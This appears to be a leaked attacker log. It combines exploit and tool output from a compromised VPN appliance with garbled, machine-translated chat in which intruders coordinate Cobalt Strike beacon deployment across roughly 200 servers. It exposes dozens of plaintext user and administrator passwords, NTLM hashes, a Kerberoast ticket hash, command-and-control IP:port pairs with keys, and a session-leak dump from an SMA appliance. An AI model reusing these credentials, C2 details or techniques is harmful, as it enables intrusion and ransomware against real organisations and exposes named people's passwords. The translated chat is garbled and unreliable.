[+] AD creds :@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 19, 'name': 'Transfer Files', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\gwcafile1\\transfer\\%USERNAME%\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 17, 'name': 'Launch Impact !!!', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Contracts Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\\contracts\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 28, 'name': 'Click to Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Managers Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\managers\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': ''T' Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\FD3\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'Trust Share "Q" Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\Trust\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'QuickBooks Share "X Drive"', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\\QuickBooks\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': '"W" Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\WorkCompShareData\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 38, 'name': 'Secure File Transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\\SecureShare\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 42, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 42, 'name': 'File Transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\Tehachapi\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 52, 'name': 'Secure File transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.5'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'SFTP Share', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Akcelerant', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'akcel-web/Akcelerant/Core/Desktop/Desktop.mvc/Index'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 63, 'name': 'FIle Transfer Link', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\Olympia\\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 63, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 64, 'name': 'Launch Akcelerant', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'akcel-web/akcelerant'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 77, 'name': 'Impact Remote Access', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.153'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Web Server', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.20.20'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Database Server', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.20.21'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Test Server', 'username': 'administrator', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.10.23'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'File Share on Akcel-Web', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'CIFS_SMB', 'host': '\\\\10.10.20.20\\Files\\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'File Share on Akcelerant Test Server', 'username': 'administrator', 'password': 'Gr@nt2011it01', 'service': 'CIFS_SMB', 'host': '\\\\10.20.0.95\\New\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Sales Department Share', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\Groups\\\\\Sales\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 43, 'name': 'Denise'PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.184'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Download and Install DAKCS Beyond', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.30:10080/BeyondSetup.zip'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Download and Install Artiva', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.30:10080/Artiva.zip'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 241, 'name': 'Connect to Office PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.56'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Beyond', 'username': 'root', 'password': 'D@kc$1', 'service': 'SSH', 'host': '10.10.10.220'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Backups', 'username': 'administrator', 'password': '2016GW@Calabasas', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.2\e$\\DAKCSBK\dakcs\\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Install Files', 'username': 'administrator', 'password': '2016GW@Calabasas', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.2\App Shares\\\DAKCS\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'GW File Share', 'username': 'stanleyford', 'password': '8826040aA!', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.12\transfer\\\MalibuGroup\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'RDP to Local PC', 'username': 'jilagan', 'password': 'Gr@nt2019', 'service': 'RDP', 'host': '10.10.11.34'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 267, 'name': 'Connect to PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.6'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc...', 'username': 'vincent.velardi', 'password': 'Grant1993**', 'service': 'RDP', 'host': '10.10.10.237'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'loraine.molina', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.226'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 271, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.228'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 273, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.146'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'pedro.campos', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.104'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 280, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.10'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 275, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.16'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 276, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.33'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 281, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.100'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 277, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.67'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 279, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.116'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 278, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.139'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 194, 'name': 'Download Streams Phone App', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'www.dropbox.com/s/bh40vtpu0w14zr9/Streams_Setup.exe?dl=0'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 282, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.119'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'octavia.mcclendon', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.41'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Sharon.Poole', 'password': 'Sharon2020@', 'service': 'RDP', 'host': '10.10.11.210'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Oscar.Aguilar', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.65'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'oasey.covello', 'password': 'Grant2021', 'service': 'RDP', 'host': '10.10.10.74'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Oscar.Soto', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.22'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'arielle.leigh', 'password': 'leseid0818', 'service': 'RDP', 'host': '10.40.10.29'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 290, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.41'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kyle.shorten', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.80'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'tony.aguayo', 'password': 'Covid2020', 'service': 'RDP', 'host': '10.10.11.107'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Daniel.Cha', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.145'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 297, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.40.10.27'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'josey.barrera', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.189'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'pilar.zuniga', 'password': 'basiaZ1929', 'service': 'RDP', 'host': '10.10.10.147'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 299, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.71'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Olivia.Sands', 'password': 'Love1978

, 'service': 'RDP', 'host': '10.40.10.23'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to Remote Access pc', 'username': 'Olivia.Sands', 'password': 'Love1978

 , 'service': 'RDP', 'host': '10.10.10.153'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Jeff.Moeller', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.105'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 303, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.123'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'luis.garcia', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.209'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Frances.Guerrero', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.208'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'luis.vasquez', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.207'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joseph.monette', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.106'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'belen.castillo', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.19'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'steve.price', 'password': 'Grantweber2020', 'service': 'RDP', 'host': '10.10.11.222'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 310, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.99'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 311, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.40.10.20'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'michael.longres', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.18'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joshua.widawski', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.39'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'eric.holmes', 'password': 'Grant2019', 'service': 'RDP', 'host': '10.10.10.112'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joanna.gallegos', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.82'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc...', 'username': 'april.vance', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.63'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Melik.Poghosyan', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.250'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Janiece.Knott', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.32'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 319, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.143'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kim.mehr', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.200'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kim.mehr', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.200'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'lionel.garcia', 'password': 'GrantWeber2020', 'service': 'RDP', 'host': '10.10.11.143'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Bernardo.soto', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.100'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'jake.ortiz', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.84'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 233, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.35'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 324, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.110'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 322, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.165'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Temp PC', 'username': 'luis.fernandez', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.153'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 335, 'name': 'Accurint', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'secure.accurint.com/app/bps/main'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Ambry Folder', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\\FD3\\\Ambry'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to my PC...', 'username': 'nia.johnson', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.138'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to my PC...', 'username': 'lori.thompson', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.148'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 213, 'name': 'Connect to my pc...', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.186'}
?till 12plus minusga all 3 in the shit? they're already pretty used by TV - but okay)) yeah, right))) there are three more from friday like you at 0? do you have coba? take it?
[+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 00KnsFUYwElND7n9AuOv0gXkEMbDbJNZdIGsGhuxVlA= userType: 1 userName: fmancuso Password: kilroyFRM321# Domain: CANALBARGE
      [+] Found: SessionID: 1aH0W0vgfKKUorMuzi0O91xtWTq01SJkw55W0d0X3UtY= userType: 1 userName: lcall Password: lc020109123//? Domain: CANALBARGE
      [+] Found: SessionID: 2HEgBXoesL1OZFmh8HwZevBxOKP07mEzHL0BJyBZ7mk= userType: 1 userName: challman Password: CHvita93! Domain: CANALBARGE
      [+] Found: SessionID: 7YA1Bbya5MRWbmtI7jQDTuCFpNr3TP0z7IZx21i7HXk= userType: 1 userName: gcalvillo Password: Lali022315 Domain: CANALBARGE
      [+] Found: SessionID: 81QtVcg20XnqLBycgw0H709ZpGKXKyFxRfv3gNFwB0M= userType: 1 userName: jturner Password: Pe@ches_!!# Domain: CANALBARGE
      [+] Found: SessionID: ALZ3k7QjO81pgnMp1YtD08SHOZE8QVDW90O9VORUvkM= userType: 1 userName: tknight Password: CBCdispatch97 Domain: CANALBARGE
      [+] Found: SessionID: GXK01m2Etj8y21LW3cYF0MpcyqxgEhKq21QvKkPx34E= userType: 1 userName: dhysaw Password: Vinger110106 Domain: CANALBARGE
      [+] Found: SessionID: HOlgsgsrlafclFRwWLx1eIg2eYApSN3pGIcbizsJXFg= userType: 1 userName: mcampbel Password: Wrc1129** Domain: CANALBARGE
      [+] Found: SessionID: NTkdkB29z1ZQ08GTBZ4zMfUnoHeC8PIqs9MQ5khx4Co= userType: 1 userName: bbarrere Password: @BnBe19310918CB2 Domain: CANALBARGE
      [+] Found: SessionID: Q072oyaSMM6DTm1Z63Rv4mFIZCy7SbSf1zsxUlCgplM= userType: 1 userName: kcamp Password: KC2020cbc Domain: CANALBARGE
      [+] Found: SessionID: QAhh9tF6cM3n5ifnj8vQBZ67JWzbZl2GT8EHJhhuF7Y= userType: 1 userName: ccatalan Password: CC6013cbc1986 Domain: CANALBARGE
      [+] Found: SessionID: QwRMW03QsuEUsKGpfNIraSL1YDXVaxgv28n0U5e18Q8= userType: 1 userName: sespinoza Password: 0306!Jessica Domain: CANALBARGE
      [+] Found: SessionID: Rx0VXlABY6z7akQcpBgjA9l7CF11QWT1Cm5tvvvBr98= userType: 1 userName: tkish Password: TJball44!!! Domain: CANALBARGE
      [+] Found: SessionID: S14OBRRWdwgNN18yL6W6WClFDN0Wu1ZKGKeuG9I0pR4CA= userType: 1 userName: ttoups Password: TOTcbc1987 Domain: CANALBARGE
      [+] Found: SessionID: a8cbVmuMbdiLvi1vihNYw3a8ccWoAq6QCxzCYEDeAxiMo= userType: 1 userName: rblanchard Password: Scottieb72985* Domain: CANALBARGE
      [+] Found: SessionID: fwgzABLIR1cfsBeDPA3CbAPQYKfK4f6RS9H2Qmq6x4U= userType: 1 userName: bwondolowski Password: Traffic2262 Domain: CANALBARGE
      [+] Found: SessionID: klh5xtYgFH7mynHLcz3c0Ah2H4rtdLUGkCyngUsrPeQ= userType: 1 userName: jreyes Password: God&faith* Domain: CANALBARGE
      [+] Found: SessionID: o3I1l3SxuvwPhyNxdf9kUDAIUjHNJJqGfzTbuG3TQxY= userType: 1 userName: slohja Password: Uwo16Uit Domain: CANALBARGE
      [+] Found: SessionID: t3fe0eWXhK7po1NFPp91aHk0oWLkaxMiRkdjxgwiA4E= userType: 1 userName: tmerrick Password: SAdie*$)pup5geaux Domain: CANALBARGE
      [+] Found: SessionID: tsrxhNflmtcBJ5WYaJEiLQubk9YjWrauMksnaOrW1UU= userType: 1 userName: jmaynard Password: Jm120113!!3 Domain: CANALBARGE
      [+] Found: SessionID: ylrGw1eBBh1ocAYKzymIB2oKDGSHvpuv3FQzgwL0WCQ= userType: 1 userName: bhulin Password: Joseph1959!@ Domain: CANALBARGE
      [+] Found: SessionID: z2zpQ7tyFfBQdFnQr7ICr7igVCx08u1qAjbTuORdFvQug= userType: 1 userName: jballard Password: JB$Williesmuckers1 Domain: CANALBARGE
``@tl1
today until what time? @user4 sayspngcpower failedpngcpower nothing to work with so you have nothing to work with? or is tv poking around? new sessions will be @tl1iandreevsnikitenkostalinottl2tl1admin
====== NetworkShares ======

  Name : ADMIN$
  Path : C:\windows
  Description : Remote Admin

  Name : C$
  Path : C:\
  Description : Default share

  Name : IPC$
  Path :
  Description : Remote IPC
``````
Domain : UKHECSLT3028
Login : Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad


Domain: MATCHES
Login: mercedesd
Password: Dinham2323
NTLM: 7c839aa54221edb65e959f18ab9bde41
We set up a timeserver, we will try to pierce through it and mark from your packs what got attracted that not on 100 in 2 and 3 77da we split uzhetudah draw the remaining 77@user7 in my opinion skidyvalem 3 kobut to servers moremozhet randl leave in the attracted immediately into the system to jump or yet do not care?hz, why did we make them? so why piip if the normal one opens? piip opened with a dll that you were given?[ ](https://mediaeveryone.com/group/sisd-net?msg=R4tMQGHYvnssSuG9x) opened?
*** initial beacon from tylerservice *@10.0.61.53 (SHAREP-WEB1)
``I wrote above:confused:`` +catchy comment?
tuta ya
``what the fuck is this first 100 fly to 185...113 to 100 servers second 100 to 199....166 without, where not attracted then C`10.0.61.53`` with pip? give the server for example which is not attracted is 300 scoreenu +- so it is not 200[ ](https://mediaeveryone.com/group/sisd-net?msg=FtspLCj7tFXPjyJcG) yes[ ](https://mediaeveryone.com/group/sisd-net?msg=toFSPaHALgWPyXEXf) yes there only one was needed then. the rest just did not close277 servers?why not vinlogon?) hz, so it happened) in kobegde? rundll32[ ](https://mediaeveryone.com/group/sisd-net?msg=4pksjc5vdTQ2erqs4) ? a question, why so many rund processes? and also let's draw what is drawnadmin.sisd.k12 and here we have a basis of 200 servers? no with 15 is sisd.k12 they are at user7 so this domain with 15 pc? I have all sessions only on admin.sisd.k12 it does not on another domain sessionset domain )))) is it? 976what is the session in the main domain? the other 2 where it is allowed to go then change the kobeThen all the kobe is not available? I have only succeeded in my login is there any new kobe? not one to connect,[ ](https://mediaeveryone.com/group/sisd-net?msg=gHYQNgtYGuPndk7PR) no net pings to the ipe koba? we have some shit with the network has not helped try to reboot the pc just in case most likely it's the connection I work with sessions last does not change I now in neikoba itself hangs still not let?[ ](https://mediaeveryone.com/group/sisd-net?msg=pzgWKwEyNwwW8T5KZ) can not rejoin, and the guys can not go either[ ](https://mediaeveryone.com/group/sisd-net?msg=YMxeLKtveT2dsfXcq) qwqe rejoin my koba hangs give me a list of cleared admins kreidenschmuck@user4vmic also does not work?i'll take it into account1 nickname on all kobas also do not roll without repetitiontranscripts and stuffnicky russian characterswhat else does not roll? transcript also do not rollHe is your idol? why?[ ](https://mediaeveryone.com/group/sisd-net?msg=MEFpGyiJ6z8H6TWLH) 3796 and lukashenko also do not rollaKiric? do i really need to explain?
12/08 17:50:20 *** Lukashenko has joined.
?What bikon is it?"(https://mediaeveryone.com/group/sisd-net?msg=eZYv8k3EgTytn8jum) @tl1 are you talking about? ?What bikon?
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
```
moyanet``.
199.127.61.166:62452
VHF2006g5jTldA0KSp9N8y3zkvmxLuSq4bS
``is it deleted?``check it out.`` x64 hopefully?``my coba``
185.150.190.113:61718
O5xFflqqDG7LDQJUDbdtkj54zQ8QDVMMI0W
``Figured it out. windows executeble(s) and how did you get it if you can not see? in payload generator do not see this listner and throw here access to the two cobbs in which we will worksome silkode on this bindpipe and here bindpipe see? now check the current dlldll start and delete it. or it's averts tear - I don't know. but the session does not come, traffic, even chet? about the not attracted found out why? since you have not found the admin will have to) and you asked why attract them)) I told you, very few people are attracted...when you pull all 200 servers, according to the classics migrate to the system process give access to the other colleagues in these kobytoy in 2 kobytoy spread po 100 on kobuna all 200 servers throw sessions in the kobyu we have 200 servers and 4000 Armory do the following, since we have not found the admin YDR everything will have to do by handBuild will be 3 files: exe, dllx64,dllx86okay then move on+++++da like done done not finished yet?on the spot now reboot the machine hangs + wait until everything is done nothing will explode) menu will pop up
until you zabmitmitmit its contents it is there) press nothing will explode? dllinject item not visible in the menu the more you leave time for a briefing the more counter questions will be answered and then you yourself will do everything will explain strategy to close not delayedok+I do not need to clean up and download 2?3/5fdsitgjeieyda, tok I did not skidkode, now@all write down who is here? ah, then all of you now install in the coba and all the use kizakimog do it in the general? you have done - write down what you have done - I give you the task as above work in this format, put in the coba new cna files ``
SFHU*G&674wEsfI&^WR
``user3user94273 how many user pc's do we have? it's on dk in admin.sisd.k1211:20 AMSnap the time here on the server and send it here+it's the contents of the file, actually```

TicketByteHexStream :
Hash : $krb5tgs$23$*certsrv$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*
                       $EA1A5A8531047E7E4B2B3BED9C3EFDBB$FA7FFB7C5BF13A60E23B1F72C9AFB9BCC7B4D914D3
                       F6EC906CF1FAF970B4741D0C83B3F3300FB0091248E4C92A6E2FAA974C347F5B2030166A0704
                       90332F19948AE385CEDBE52C70513BBE70E9140D9261367EE80B8538F41F313C8D776D5B0EA4
                       A397B3F19F3F67DE34ECA5083D5F7AC3FB2B62A316AC2D2E1C642D027AED0E931C435445C206
